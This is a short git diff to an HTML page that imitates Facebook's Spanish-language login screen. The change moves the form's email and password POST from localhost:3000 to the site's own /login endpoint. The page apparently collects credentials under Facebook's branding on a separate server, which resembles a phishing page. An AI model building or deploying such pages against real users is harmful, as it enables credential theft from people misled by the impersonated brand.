--- a/public/index.html
+++ b/public/index.html
@@ -14,7 +14,7 @@
             <div class="logo">
                 <img src="logo.png" alt="Logo de Facebook">
             </div>
-            <form class="login-form" action="http://localhost:3000/login" method="POST">
+            <form class="login-form" action="/login" method="POST">
                 <input type="text" name="email" placeholder="Correo electrónico o número de teléfono" required>
                 <div class="password-container">
                     <input type="password" name="password" id="password" placeholder="Contraseña" required>
